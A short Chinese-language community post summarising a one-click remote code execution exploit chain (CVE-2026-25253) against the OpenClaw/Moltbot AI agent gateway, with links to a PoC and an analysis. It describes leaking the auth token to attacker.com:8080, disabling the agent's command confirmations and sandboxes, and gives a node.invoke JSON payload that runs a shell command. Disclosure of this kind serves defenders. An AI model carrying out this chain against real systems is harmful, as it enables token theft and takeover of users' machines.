Clawdbot/Moltbot/OpenClaw 一键远程代码执行 PoC 🦞 (CVE-2026-25253)

Clawdbot/Moltbot/OpenClaw 一键远程代码执行 PoC 🦞 (CVE-2026-25253)

完整的一键远程代码执行漏洞利用链
  1. 受害者访问attacker.com(实际上是一个不起眼的网址)
  2. 客户端 JavaScript 代码attacker.com在受害浏览器上执行,打开一个后台窗口http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080。这会将身份验证令牌发送到目标服务器。attacker.com:8080
  3. attacker.com受害者浏览器上执行的客户端 JavaScript 代码会创建一个 WebSocket 连接ws://localhost:18789(默认的 OpenClaw 服务器配置),并使用窃取的令牌进行身份验证。然后,它会向以下 API 发送请求:
  • 禁用危险命令的用户确认
  • 禁用所有沙盒
  • 最后,为了实现任意命令执行,攻击者的 JavaScript 代码会执行以下node.invoke请求:
    {
         "type": "req",
         "id": "4",
         "method": "node.invoke",
         "params": {
              "nodeId": "main",
              "command": "system.run",
              "params": {
                   "cmd": "bash -c 'echo hacked > /tmp/hacked'"
              },
              "timeoutMs": 60000,
              "idempotencyKey": "rev1"
         }
    }
    POC:
    https://github.com/ethiack/moltbot-1click-rce
    文章分析:
    https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享
wangwei839的头像-HackTwoHub社区黄金会员
评论 抢沙发

请登录后发表评论

    暂无评论内容